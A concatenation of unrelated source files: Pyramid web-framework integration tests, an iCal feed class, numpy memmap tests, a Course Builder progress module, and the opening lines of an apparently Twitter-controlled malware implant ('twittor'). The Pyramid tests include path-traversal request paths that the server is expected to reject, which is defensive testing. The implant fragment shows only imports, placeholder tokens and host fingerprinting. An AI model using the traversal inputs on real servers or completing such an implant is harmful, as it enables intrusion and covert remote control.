fn = os.path.join(here, 'fixtures/static/index.html')
res = self.testapp.get('/static/', status=200)
_assertBody(res.body, fn)
def test_range_inclusive(self):
self.testapp.extra_environ = {'HTTP_RANGE':'bytes=1-2'}
res = self.testapp.get('/static/index.html', status=206)
self.assertEqual(res.body, b'ht')
def test_range_tilend(self):
self.testapp.extra_environ = {'HTTP_RANGE':'bytes=-5'}
res = self.testapp.get('/static/index.html', status=206)
self.assertEqual(res.body, b'html>')
def test_range_notbytes(self):
self.testapp.extra_environ = {'HTTP_RANGE':'kHz=-5'}
res = self.testapp.get('/static/index.html', status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_range_multiple(self):
res = self.testapp.get('/static/index.html',
[('HTTP_RANGE', 'bytes=10-11,11-12')],
status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_range_oob(self):
self.testapp.extra_environ = {'HTTP_RANGE':'bytes=1000-1002'}
self.testapp.get('/static/index.html', status=416)
def test_notfound(self):
self.testapp.get('/static/wontbefound.html', status=404)
def test_oob_dotdotslash(self):
self.testapp.get('/static/../../test_integration.py', status=404)
def test_oob_dotdotslash_encoded(self):
self.testapp.get('/static/%2E%2E%2F/test_integration.py', status=404)
def test_oob_slash(self):
self.testapp.get('/%2F/test_integration.py', status=404)
class TestEventOnlySubscribers(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.eventonly'
def test_sendfoo(self):
res = self.testapp.get('/sendfoo', status=200)
self.assertEqual(sorted(res.body.split()), [b'foo', b'fooyup'])
def test_sendfoobar(self):
res = self.testapp.get('/sendfoobar', status=200)
self.assertEqual(sorted(res.body.split()),
[b'foobar', b'foobar2', b'foobaryup', b'foobaryup2'])
class TestStaticAppUsingAbsPath(StaticAppBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.static_abspath'
class TestStaticAppUsingAssetSpec(StaticAppBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.static_assetspec'
class TestStaticAppNoSubpath(unittest.TestCase):
staticapp = static_view(os.path.join(here, 'fixtures'), use_subpath=False)
def _makeRequest(self, extra):
from pyramid.request import Request
from io import BytesIO
kw = {'PATH_INFO':'',
'SCRIPT_NAME':'',
'SERVER_NAME':'localhost',
'SERVER_PORT':'80',
'REQUEST_METHOD':'GET',
'wsgi.version':(1,0),
'wsgi.url_scheme':'http',
'wsgi.input':BytesIO()}
kw.update(extra)
request = Request(kw)
return request
def test_basic(self):
request = self._makeRequest({'PATH_INFO':'/minimal.txt'})
context = DummyContext()
result = self.staticapp(context, request)
self.assertEqual(result.status, '200 OK')
_assertBody(result.body, os.path.join(here, 'fixtures/minimal.txt'))
class TestStaticAppWithRoutePrefix(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.static_routeprefix'
def test_includelevel1(self):
res = self.testapp.get('/static/minimal.txt', status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/minimal.txt'))
def test_includelevel2(self):
res = self.testapp.get('/prefix/static/index.html', status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/static/index.html'))
class TestFixtureApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.fixtureapp'
def test_another(self):
res = self.testapp.get('/another.html', status=200)
self.assertEqual(res.body, b'fixture')
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertEqual(res.body, b'fixture')
def test_dummyskin(self):
self.testapp.get('/dummyskin.html', status=404)
def test_error(self):
res = self.testapp.get('/error.html', status=200)
self.assertEqual(res.body, b'supressed')
def test_protected(self):
self.testapp.get('/protected.html', status=403)
class TestStaticPermApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.staticpermapp'
root_factory = 'pyramid.tests.pkgs.staticpermapp:RootFactory'
def test_allowed(self):
result = self.testapp.get('/allowed/index.html', status=200)
_assertBody(result.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_denied_via_acl_global_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'bob'}
self.testapp.get('/protected/index.html', status=403)
def test_allowed_via_acl_global_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'fred'}
result = self.testapp.get('/protected/index.html', status=200)
_assertBody(result.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_denied_via_acl_local_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'fred'}
self.testapp.get('/factory_protected/index.html', status=403)
def test_allowed_via_acl_local_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'bob'}
result = self.testapp.get('/factory_protected/index.html', status=200)
_assertBody(result.body,
os.path.join(here, 'fixtures/static/index.html'))
class TestCCBug(IntegrationBase, unittest.TestCase):
# "unordered" as reported in IRC by author of
# http://labs.creativecommons.org/2010/01/13/cc-engine-and-web-non-frameworks/
package = 'pyramid.tests.pkgs.ccbugapp'
def test_rdf(self):
res = self.testapp.get('/licenses/1/v1/rdf', status=200)
self.assertEqual(res.body, b'rdf')
def test_juri(self):
res = self.testapp.get('/licenses/1/v1/juri', status=200)
self.assertEqual(res.body, b'juri')
class TestHybridApp(IntegrationBase, unittest.TestCase):
# make sure views registered for a route "win" over views registered
# without one, even though the context of the non-route view may
# be more specific than the route view.
package = 'pyramid.tests.pkgs.hybridapp'
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertEqual(res.body, b'global')
def test_abc(self):
res = self.testapp.get('/abc', status=200)
self.assertEqual(res.body, b'route')
def test_def(self):
res = self.testapp.get('/def', status=200)
self.assertEqual(res.body, b'route2')
def test_ghi(self):
res = self.testapp.get('/ghi', status=200)
self.assertEqual(res.body, b'global')
def test_jkl(self):
self.testapp.get('/jkl', status=404)
def test_mno(self):
self.testapp.get('/mno', status=404)
def test_pqr_global2(self):
res = self.testapp.get('/pqr/global2', status=200)
self.assertEqual(res.body, b'global2')
def test_error(self):
res = self.testapp.get('/error', status=200)
self.assertEqual(res.body, b'supressed')
def test_error2(self):
res = self.testapp.get('/error2', status=200)
self.assertEqual(res.body, b'supressed2')
def test_error_sub(self):
res = self.testapp.get('/error_sub', status=200)
self.assertEqual(res.body, b'supressed2')
class TestRestBugApp(IntegrationBase, unittest.TestCase):
# test bug reported by delijati 2010/2/3 (http://pastebin.com/d4cc15515)
package = 'pyramid.tests.pkgs.restbugapp'
def test_it(self):
res = self.testapp.get('/pet', status=200)
self.assertEqual(res.body, b'gotten')
class TestForbiddenAppHasResult(IntegrationBase, unittest.TestCase):
# test that forbidden exception has ACLDenied result attached
package = 'pyramid.tests.pkgs.forbiddenapp'
def test_it(self):
res = self.testapp.get('/x', status=403)
message, result = [x.strip() for x in res.body.split(b'\n')]
self.assertTrue(message.endswith(b'failed permission check'))
self.assertTrue(
result.startswith(b"ACLDenied permission 'private' via ACE "
b"'<default deny>' in ACL "
b"'<No ACL found on any object in resource "
b"lineage>' on context"))
self.assertTrue(
result.endswith(b"for principals ['system.Everyone']"))
class TestViewDecoratorApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.viewdecoratorapp'
def test_first(self):
res = self.testapp.get('/first', status=200)
self.assertTrue(b'OK' in res.body)
def test_second(self):
res = self.testapp.get('/second', status=200)
self.assertTrue(b'OK2' in res.body)
class TestNotFoundView(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.notfoundview'
def test_it(self):
res = self.testapp.get('/wontbefound', status=200)
self.assertTrue(b'generic_notfound' in res.body)
res = self.testapp.get('/bar', status=302)
self.assertEqual(res.location, 'http://localhost/bar/')
res = self.testapp.get('/bar/', status=200)
self.assertTrue(b'OK bar' in res.body)
res = self.testapp.get('/foo', status=302)
self.assertEqual(res.location, 'http://localhost/foo/')
res = self.testapp.get('/foo/', status=200)
self.assertTrue(b'OK foo2' in res.body)
res = self.testapp.get('/baz', status=200)
self.assertTrue(b'baz_notfound' in res.body)
class TestForbiddenView(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.forbiddenview'
def test_it(self):
res = self.testapp.get('/foo', status=200)
self.assertTrue(b'foo_forbidden' in res.body)
res = self.testapp.get('/bar', status=200)
self.assertTrue(b'generic_forbidden' in res.body)
class TestViewPermissionBug(IntegrationBase, unittest.TestCase):
# view_execution_permitted bug as reported by Shane at http://lists.repoze.org/pipermail/repoze-dev/2010-October/003603.html
package = 'pyramid.tests.pkgs.permbugapp'
def test_test(self):
res = self.testapp.get('/test', status=200)
self.assertTrue(b'ACLDenied' in res.body)
def test_x(self):
self.testapp.get('/x', status=403)
class TestDefaultViewPermissionBug(IntegrationBase, unittest.TestCase):
# default_view_permission bug as reported by Wiggy at http://lists.repoze.org/pipermail/repoze-dev/2010-October/003602.html
package = 'pyramid.tests.pkgs.defpermbugapp'
def test_x(self):
res = self.testapp.get('/x', status=403)
self.assertTrue(b'failed permission check' in res.body)
def test_y(self):
res = self.testapp.get('/y', status=403)
self.assertTrue(b'failed permission check' in res.body)
def test_z(self):
res = self.testapp.get('/z', status=200)
self.assertTrue(b'public' in res.body)
from pyramid.tests.pkgs.exceptionviewapp.models import \
AnException, NotAnException
excroot = {'anexception':AnException(),
'notanexception':NotAnException()}
class TestExceptionViewsApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.exceptionviewapp'
root_factory = lambda *arg: excroot
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertTrue(b'maybe' in res.body)
def test_notanexception(self):
res = self.testapp.get('/notanexception', status=200)
self.assertTrue(b'no' in res.body)
def test_anexception(self):
res = self.testapp.get('/anexception', status=200)
self.assertTrue(b'yes' in res.body)
def test_route_raise_exception(self):
res = self.testapp.get('/route_raise_exception', status=200)
self.assertTrue(b'yes' in res.body)
def test_route_raise_exception2(self):
res = self.testapp.get('/route_raise_exception2', status=200)
self.assertTrue(b'yes' in res.body)
def test_route_raise_exception3(self):
res = self.testapp.get('/route_raise_exception3', status=200)
self.assertTrue(b'whoa' in res.body)
def test_route_raise_exception4(self):
res = self.testapp.get('/route_raise_exception4', status=200)
self.assertTrue(b'whoa' in res.body)
def test_raise_httpexception(self):
res = self.testapp.get('/route_raise_httpexception', status=200)
self.assertTrue(b'caught' in res.body)
class TestConflictApp(unittest.TestCase):
package = 'pyramid.tests.pkgs.conflictapp'
def _makeConfig(self):
from pyramid.config import Configurator
config = Configurator()
return config
def test_autoresolved_view(self):
config = self._makeConfig()
config.include(self.package)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/')
self.assertTrue(b'a view' in res.body)
res = self.testapp.get('/route')
self.assertTrue(b'route view' in res.body)
def test_overridden_autoresolved_view(self):
from pyramid.response import Response
config = self._makeConfig()
config.include(self.package)
def thisview(request):
return Response('this view')
config.add_view(thisview)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/')
self.assertTrue(b'this view' in res.body)
def test_overridden_route_view(self):
from pyramid.response import Response
config = self._makeConfig()
config.include(self.package)
def thisview(request):
return Response('this view')
config.add_view(thisview, route_name='aroute')
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/route')
self.assertTrue(b'this view' in res.body)
def test_nonoverridden_authorization_policy(self):
config = self._makeConfig()
config.include(self.package)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/protected', status=403)
self.assertTrue(b'403 Forbidden' in res.body)
def test_overridden_authorization_policy(self):
config = self._makeConfig()
config.include(self.package)
from pyramid.testing import DummySecurityPolicy
config.set_authorization_policy(DummySecurityPolicy('fred'))
config.set_authentication_policy(DummySecurityPolicy(permissive=True))
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
res = self.testapp.get('/protected', status=200)
self.assertTrue('protected view' in res)
class ImperativeIncludeConfigurationTest(unittest.TestCase):
def setUp(self):
from pyramid.config import Configurator
config = Configurator()
from pyramid.tests.pkgs.includeapp1.root import configure
configure(config)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertTrue(b'root' in res.body)
def test_two(self):
res = self.testapp.get('/two', status=200)
self.assertTrue(b'two' in res.body)
def test_three(self):
res = self.testapp.get('/three', status=200)
self.assertTrue(b'three' in res.body)
class SelfScanAppTest(unittest.TestCase):
def setUp(self):
from pyramid.tests.test_config.pkgs.selfscan import main
config = main()
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertTrue(b'root' in res.body)
def test_two(self):
res = self.testapp.get('/two', status=200)
self.assertTrue(b'two' in res.body)
class WSGIApp2AppTest(unittest.TestCase):
def setUp(self):
from pyramid.tests.pkgs.wsgiapp2app import main
config = main()
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_hello(self):
res = self.testapp.get('/hello', status=200)
self.assertTrue(b'Hello' in res.body)
class SubrequestAppTest(unittest.TestCase):
def setUp(self):
from pyramid.tests.pkgs.subrequestapp import main
config = main()
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
def test_one(self):
res = self.testapp.get('/view_one', status=200)
self.assertTrue(b'This came from view_two' in res.body)
def test_three(self):
res = self.testapp.get('/view_three', status=500)
self.assertTrue(b'Bad stuff happened' in res.body)
def test_five(self):
res = self.testapp.get('/view_five', status=200)
self.assertTrue(b'Value error raised' in res.body)
class RendererScanAppTest(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.rendererscanapp'
def test_root(self):
res = self.testapp.get('/one', status=200)
self.assertTrue(b'One!' in res.body)
def test_two(self):
res = self.testapp.get('/two', status=200)
self.assertTrue(b'Two!' in res.body)
def test_rescan(self):
self.config.scan('pyramid.tests.pkgs.rendererscanapp')
app = self.config.make_wsgi_app()
from webtest import TestApp
testapp = TestApp(app)
res = testapp.get('/one', status=200)
self.assertTrue(b'One!' in res.body)
res = testapp.get('/two', status=200)
self.assertTrue(b'Two!' in res.body)
class UnicodeInURLTest(unittest.TestCase):
def _makeConfig(self):
from pyramid.config import Configurator
config = Configurator()
return config
def _makeTestApp(self, config):
from webtest import TestApp
app = config.make_wsgi_app()
return TestApp(app)
def test_unicode_in_url_404(self):
request_path = '/avalia%C3%A7%C3%A3o_participante'
request_path_unicode = b'/avalia\xc3\xa7\xc3\xa3o_participante'.decode('utf-8')
config = self._makeConfig()
testapp = self._makeTestApp(config)
res = testapp.get(request_path, status=404)
# Pyramid default 404 handler outputs:
# u'404 Not Found\n\nThe resource could not be found.\n\n\n'
# u'/avalia\xe7\xe3o_participante\n\n'
self.assertTrue(request_path_unicode in res.text)
def test_unicode_in_url_200(self):
request_path = '/avalia%C3%A7%C3%A3o_participante'
request_path_unicode = b'/avalia\xc3\xa7\xc3\xa3o_participante'.decode('utf-8')
def myview(request):
return 'XXX'
config = self._makeConfig()
config.add_route('myroute', request_path_unicode)
config.add_view(myview, route_name='myroute', renderer='json')
testapp = self._makeTestApp(config)
res = testapp.get(request_path, status=200)
self.assertEqual(res.text, '"XXX"')
class AcceptContentTypeTest(unittest.TestCase):
def setUp(self):
def hello_view(request):
return {'message': 'Hello!'}
from pyramid.config import Configurator
config = Configurator()
config.add_route('hello', '/hello')
config.add_view(hello_view, route_name='hello', accept='text/plain', renderer='string')
config.add_view(hello_view, route_name='hello', accept='application/json', renderer='json')
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
def tearDown(self):
import pyramid.config
pyramid.config.global_registries.empty()
def test_ordering(self):
res = self.testapp.get('/hello', headers={'Accept': 'application/json; q=1.0, text/plain; q=0.9'}, status=200)
self.assertEqual(res.content_type, 'application/json')
res = self.testapp.get('/hello', headers={'Accept': 'text/plain; q=0.9, application/json; q=1.0'}, status=200)
self.assertEqual(res.content_type, 'application/json')
def test_wildcards(self):
res = self.testapp.get('/hello', headers={'Accept': 'application/*'}, status=200)
self.assertEqual(res.content_type, 'application/json')
res = self.testapp.get('/hello', headers={'Accept': 'text/*'}, status=200)
self.assertEqual(res.content_type, 'text/plain')
class DummyContext(object):
pass
class DummyRequest:
subpath = ('__init__.py',)
traversed = None
environ = {'REQUEST_METHOD':'GET', 'wsgi.version':(1,0)}
def get_response(self, application):
return application(None, None)
def httpdate(ts):
return ts.strftime("%a, %d %b %Y %H:%M:%S GMT")
def read_(filename):
with open(filename, 'rb') as fp:
val = fp.read()
return val
def _assertBody(body, filename):
if defaultlocale is None: # pragma: no cover
# If system locale does not have an encoding then default to utf-8
filename = filename.encode('utf-8')
# strip both \n and \r for windows
body = body.replace(b'\r', b'')
body = body.replace(b'\n', b'')
data = read_(filename)
data = data.replace(b'\r', b'')
data = data.replace(b'\n', b'')
assert(body == data)
| cc0-1.0 |
rtucker-mozilla/WhistlePig | whistlepig/ical/ical_entries_feed.py | 1 | 2217 | import datetime
import django_cal
from django_cal.views import Events
import dateutil.rrule as rrule
import whistlepig.whistlepig.models as models
from django.conf import settings
import pytz
class iCalEntriesFeed(Events):
def items(self):
return models.StatusUpdate.objects.filter(is_private = False).all()
def cal_name(self):
return "Mozilla Status Updates"
def cal_desc(self):
return "Mozilla Status Updates"
def item_summary(self, item):
return item.summary
def item_description(self, item):
return item.description
def get_time_as_utc(self, input_time, item):
utc_tz = pytz.timezone('UTC')
pacific_tz = pytz.timezone('America/Los_Angeles')
tmp = datetime.datetime(
input_time.year,
input_time.month,
input_time.day,
input_time.hour,
input_time.minute,
input_time.second)
if item.timezone.name != u'UTC':
tmp = pacific_tz.localize(datetime.datetime(
input_time.year,
input_time.month,
input_time.day,
input_time.hour,
input_time.minute,
input_time.second))
else:
tmp = utc_tz.localize(datetime.datetime(
input_time.year,
input_time.month,
input_time.day,
input_time.hour,
input_time.minute,
input_time.second))
return tmp.astimezone(utc_tz)
def item_start(self, item):
return self.get_time_as_utc(item.start_time, item)
def item_end(self, item):
if item.end_time:
return self.get_time_as_utc(item.end_time, item)
else:
return self.get_time_as_utc(item.start_time, item)
def item_categories(self, item):
return [i.service.name for i in item.serviceoutage_set.all()]
def item_url(self, item):
return "%s/detail/%s/" % (settings.SITE_URL, item.id)
def __init__(self, *args, **kwargs):
super(iCalEntriesFeed, self).__init__(*args, **kwargs)
| bsd-3-clause |
josecolella/PLD | bin/osx/treasurehunters.app/Contents/Resources/lib/python3.4/numpy/core/tests/test_memmap.py | 65 | 4208 | from __future__ import division, absolute_import, print_function
import sys
from tempfile import NamedTemporaryFile, TemporaryFile, mktemp, mkdtemp
import os
import shutil
from numpy import memmap
from numpy import arange, allclose, asarray
from numpy.testing import *
class TestMemmap(TestCase):
def setUp(self):
self.tmpfp = NamedTemporaryFile(prefix='mmap')
self.tempdir = mkdtemp()
self.shape = (3, 4)
self.dtype = 'float32'
self.data = arange(12, dtype=self.dtype)
self.data.resize(self.shape)
def tearDown(self):
self.tmpfp.close()
shutil.rmtree(self.tempdir)
def test_roundtrip(self):
# Write data to file
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
fp[:] = self.data[:]
del fp # Test __del__ machinery, which handles cleanup
# Read data back from file
newfp = memmap(self.tmpfp, dtype=self.dtype, mode='r',
shape=self.shape)
assert_(allclose(self.data, newfp))
assert_array_equal(self.data, newfp)
def test_open_with_filename(self):
tmpname = mktemp('', 'mmap', dir=self.tempdir)
fp = memmap(tmpname, dtype=self.dtype, mode='w+',
shape=self.shape)
fp[:] = self.data[:]
del fp
def test_unnamed_file(self):
with TemporaryFile() as f:
fp = memmap(f, dtype=self.dtype, shape=self.shape)
del fp
def test_attributes(self):
offset = 1
mode = "w+"
fp = memmap(self.tmpfp, dtype=self.dtype, mode=mode,
shape=self.shape, offset=offset)
self.assertEqual(offset, fp.offset)
self.assertEqual(mode, fp.mode)
del fp
def test_filename(self):
tmpname = mktemp('', 'mmap', dir=self.tempdir)
fp = memmap(tmpname, dtype=self.dtype, mode='w+',
shape=self.shape)
abspath = os.path.abspath(tmpname)
fp[:] = self.data[:]
self.assertEqual(abspath, fp.filename)
b = fp[:1]
self.assertEqual(abspath, b.filename)
del b
del fp
def test_filename_fileobj(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode="w+",
shape=self.shape)
self.assertEqual(fp.filename, self.tmpfp.name)
@dec.knownfailureif(sys.platform=='gnu0', "This test is known to fail on hurd")
def test_flush(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
fp[:] = self.data[:]
assert_equal(fp[0], self.data[0])
fp.flush()
def test_del(self):
# Make sure a view does not delete the underlying mmap
fp_base = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
fp_base[0] = 5
fp_view = fp_base[0:1]
assert_equal(fp_view[0], 5)
del fp_view
# Should still be able to access and assign values after
# deleting the view
assert_equal(fp_base[0], 5)
fp_base[0] = 6
assert_equal(fp_base[0], 6)
def test_arithmetic_drops_references(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
tmp = (fp + 10)
if isinstance(tmp, memmap):
assert tmp._mmap is not fp._mmap
def test_indexing_drops_references(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
tmp = fp[[(1, 2), (2, 3)]]
if isinstance(tmp, memmap):
assert tmp._mmap is not fp._mmap
def test_slicing_keeps_references(self):
fp = memmap(self.tmpfp, dtype=self.dtype, mode='w+',
shape=self.shape)
assert fp[:2, :2]._mmap is fp._mmap
def test_view(self):
fp = memmap(self.tmpfp, dtype=self.dtype, shape=self.shape)
new1 = fp.view()
new2 = new1.view()
assert(new1.base is fp)
assert(new2.base is fp)
new_array = asarray(fp)
assert(new_array.base is fp)
if __name__ == "__main__":
run_module_suite()
| mit |
andela-angene/coursebuilder-core | coursebuilder/modules/manual_progress/manual_progress.py | 3 | 10308 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module allowing manual marking of unit/lesson progress."""
__author__ = 'Mike Gainer ([email protected])'
import os
import jinja2
import appengine_config
from common import crypto
from common import tags
from common import utils as common_utils
from controllers import utils
from models import custom_modules
from models import progress
from models import transforms
from modules.courses import lessons
custom_module = None
MODULE_NAME = 'Manual Progress'
XSRF_ACTION = 'manual_progress'
TEMPLATES_DIR = os.path.join(
appengine_config.BUNDLE_ROOT, 'modules', 'manual_progress', 'templates')
RESOURCES_PATH = '/modules/manual_progress/resources'
# pylint: disable=unbalanced-tuple-unpacking
class ProgressRESTBase(utils.BaseRESTHandler):
def _perform_checks(self):
success = False
key = self.request.params.get('key')
student = self.get_student()
course = self.get_course()
if not self.assert_xsrf_token_or_fail(
self.request.params, XSRF_ACTION, {'key': key}):
pass
elif not key:
transforms.send_json_response(
self, 400, 'Bad Request.', {})
elif not student or student.is_transient or not student.is_enrolled:
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
elif not course:
transforms.send_json_response(
self, 400, 'Bad Request.', {'key': key})
elif not self.app_context.is_editable_fs():
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
else:
success = True
return success, key, student, course
def _send_success_response(self, key, status):
transforms.send_json_response(
self, 200, 'OK.', {'key': key,
'status': status})
class CourseProgressRESTHandler(ProgressRESTBase):
URI = '/rest/student/progress/course'
def _perform_checks(self):
_progress = None
success, key, student, course = (
super(CourseProgressRESTHandler, self)._perform_checks())
if success:
_progress = course.get_progress_tracker()
return success, key, student, _progress
def _send_success_response(self, key, student, _progress):
super(CourseProgressRESTHandler, self)._send_success_response(
key,
_progress.get_course_status(
_progress.get_or_create_progress(student)))
def get(self):
success, key, student, _progress = self._perform_checks()
if success:
self._send_success_response(key, student, _progress)
def post(self):
success, key, student, _progress = self._perform_checks()
if success:
_progress.force_course_completed(student)
self._send_success_response(key, student, _progress)
class UnitProgressRESTHandler(ProgressRESTBase):
URI = '/rest/student/progress/unit'
def _perform_checks(self):
unit = None
_progress = None
success, key, student, course = (
super(UnitProgressRESTHandler, self)._perform_checks())
if success:
_progress = course.get_progress_tracker()
unit = course.find_unit_by_id(key)
if not unit:
success = False
transforms.send_json_response(
self, 400, 'Bad Request.', {'key': key})
return success, key, student, unit, _progress
def _send_success_response(self, key, student, unit, _progress):
super(UnitProgressRESTHandler, self)._send_success_response(
key,
_progress.get_unit_status(
_progress.get_or_create_progress(student),
unit.unit_id))
def get(self):
success, key, student, unit, _progress = self._perform_checks()
if success:
self._send_success_response(key, student, unit, _progress)
def post(self):
success, key, student, unit, _progress = self._perform_checks()
if success:
if not unit.manual_progress:
success = False
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
else:
_progress.force_unit_completed(student, unit.unit_id)
self._send_success_response(key, student, unit, _progress)
class LessonProgressRESTHandler(ProgressRESTBase):
URI = '/rest/student/progress/lesson'
def _perform_checks(self):
lesson = None
_progress = None
success, key, student, course = (
super(LessonProgressRESTHandler, self)._perform_checks())
if success:
_progress = course.get_progress_tracker()
lesson = common_utils.find(lambda l: str(l.lesson_id) == key,
course.get_lessons_for_all_units())
if not lesson:
success = False
transforms.send_json_response(
self, 400, 'Bad Request.', {'key': key})
return success, key, student, lesson, _progress
def _send_success_response(self, key, student, lesson, _progress):
super(LessonProgressRESTHandler, self)._send_success_response(
key,
_progress.get_lesson_status(
_progress.get_or_create_progress(student),
lesson.unit_id,
lesson.lesson_id))
def get(self):
success, key, student, lesson, _progress = self._perform_checks()
if success:
self._send_success_response(key, student, lesson, _progress)
def post(self):
success, key, student, lesson, _progress = self._perform_checks()
if success:
if not lesson.manual_progress:
success = False
transforms.send_json_response(
self, 401, 'Access Denied.', {'key': key})
else:
_progress.put_html_completed(
student, lesson.unit_id, lesson.lesson_id)
self._send_success_response(key, student, lesson, _progress)
def _build_completion_button_for_unit_lesson_page(
app_context, course, unit, lesson, assessment, student_view, student):
return _build_completion_button(app_context, course, student, unit, lesson)
def _build_completion_button_for_course_page(
app_context, course, student_view, student):
return _build_completion_button(app_context, course, student, None, None)
def _build_completion_button(app_context, course, student, unit, lesson):
"""Add manual-completion buttons to footer of syllabus/unit/lesson pages."""
if not student or student.is_transient:
return None
xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(XSRF_ACTION)
template_data = {}
# Course force-completion is coded and working, but there's no
# UI/UX that cares about it in the base code. This is left here as
# a convenience, in case some particular course needs to have manual
# course completion. The general course won't, so we suppress this
# button from appearing on all course content pages.
#
#template_data['course'] = {
# 'url': CourseProgressRESTHandler.URI.lstrip('/'),
# 'key': None,
# 'xsrf_token': xsrf_token,
#}
tracker = None
_progress = None
COMPLETED_STATE = progress.UnitLessonCompletionTracker.COMPLETED_STATE
if (unit and unit.manual_progress) or (lesson and lesson.manual_progress):
tracker = course.get_progress_tracker()
_progress = tracker.get_or_create_progress(student)
if unit and unit.manual_progress:
if tracker.get_unit_status(
_progress, unit.unit_id) != COMPLETED_STATE:
template_data['unit'] = {
'url': UnitProgressRESTHandler.URI.lstrip('/'),
'key': str(unit.unit_id),
'xsrf_token': xsrf_token,
}
if lesson and lesson.manual_progress:
if tracker.get_lesson_status(
_progress, lesson.unit_id, lesson.lesson_id) != COMPLETED_STATE:
template_data['lesson'] = {
'url': LessonProgressRESTHandler.URI.lstrip('/'),
'key': str(lesson.lesson_id),
'xsrf_token': xsrf_token,
}
if template_data:
template_environ = app_context.get_template_environ(
app_context.get_current_locale(), [TEMPLATES_DIR])
return jinja2.Markup(
template_environ.get_template('manual_progress.html').render(
template_data))
return None
def register_module():
def notify_module_enabled():
lessons.UnitHandler.EXTRA_CONTENT.append(
_build_completion_button_for_unit_lesson_page)
lessons.CourseHandler.EXTRA_CONTENT.append(
_build_completion_button_for_course_page)
global_routes = [
(os.path.join(RESOURCES_PATH, 'js', '.*'), tags.JQueryHandler),
(os.path.join(RESOURCES_PATH, '.*'), tags.ResourcesHandler)]
namespaced_handlers = [
(CourseProgressRESTHandler.URI, CourseProgressRESTHandler),
(UnitProgressRESTHandler.URI, UnitProgressRESTHandler),
(LessonProgressRESTHandler.URI, LessonProgressRESTHandler),
]
global custom_module # pylint: disable=global-statement
custom_module = custom_modules.Module(
MODULE_NAME,
'Manual marking of unit/lesson progress',
global_routes, namespaced_handlers,
notify_module_enabled=notify_module_enabled)
return custom_module
| apache-2.0 |
xujun10110/twittor | implant.py | 18 | 5478 | from tweepy import Stream
from tweepy import OAuthHandler
from tweepy import API
from tweepy.streaming import StreamListener
from uuid import getnode as get_mac
import ctypes
import json
import threading
import subprocess
import base64
import platform
api = None
# These values are appropriately filled in the code
CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
MAC_ADDRESS = ':'.join(("%012X" % get_mac())[i:i + 2] for i in range(0, 12, 2))
#
# Exception for Twittor
#
class TwittorException(Exception):
"""
Base exception
"""
def __init__(self, message, errors):
